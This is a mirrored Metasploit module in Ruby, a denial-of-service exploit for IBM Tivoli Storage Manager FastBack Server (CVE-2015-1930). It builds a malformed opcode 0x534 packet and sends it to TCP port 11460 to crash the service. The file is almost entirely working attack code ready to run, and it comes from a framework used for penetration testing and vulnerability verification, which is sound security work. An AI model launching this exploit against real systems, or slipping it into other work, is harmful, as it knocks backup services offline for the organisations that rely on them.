Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/misc/ibm_tsm_dos.rb
24309 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service',

15
        'Description' => %q{

16
          This module exploits a denial of service condition present in IBM Tivoli Storage Manager

17
          FastBack Server when dealing with packets triggering the opcode 0x534 handler.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => [

21
          'Gianni Gnesa', # Public disclosure/Proof of Concept

22
          'William Webb <william_webb[at]rapid7.com>', # Metasploit

23
        ],

24
        'References' => [

25
          ['CVE', '2015-1930'],

26
          ['EDB', '38979'],

27
          ['OSVDB', '132307']

28
        ],

29
        'DisclosureDate' => '2015-12-15',

30
        'Notes' => {

31
          'Stability' => [CRASH_SERVICE_DOWN],

32
          'SideEffects' => [],

33
          'Reliability' => []

34
        }

35
      )

36
    )

37


38
    register_options(

39
      [

40
        Opt::RPORT(11460)

41
      ]

42
    )

43
  end

44


45
  def tv_pkt(opcode, p1 = '', p2 = '', p3 = '')

46
    buf = Rex::Text.rand_text_alpha(0x0C)

47
    buf += [opcode].pack('V')

48
    buf += [0x00].pack('V')

49
    buf += [p1.length].pack('V')

50
    buf += [p1.length].pack('V')

51
    buf += [p2.length].pack('V')

52
    buf += [p1.length + p2.length].pack('V')

53
    buf += [p3.length].pack('V')

54


55
    buf += Rex::Text.rand_text_alpha(0x08)

56


57
    buf += p1

58
    buf += p2

59
    buf += p3

60


61
    pkt = [buf.length].pack('N')

62
    pkt << buf

63


64
    return pkt

65
  end

66


67
  def run

68
    target_opcode = 0x534

69
    connect

70
    print_status("Connected to: #{rhost} port: #{rport}")

71
    print_status('Sending malicious packet')

72


73
    p = tv_pkt(

74
      target_opcode,

75
      "File: #{Rex::Text.rand_text_alpha(0x200)} From: 0 To: 0 ChunkLoc: 0 FileLoc: 0",

76
      Rex::Text.rand_text_alpha(0x60),

77
      Rex::Text.rand_text_alpha(0x60)

78
    )

79


80
    sock.put(p)

81
    print_status('Packet sent!')

82
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e

83
    print_error("Exploit failed: #{e.class} #{e.message}")

84
    elog(e)

85
  ensure

86
    disconnect

87
  end

88
end

89


90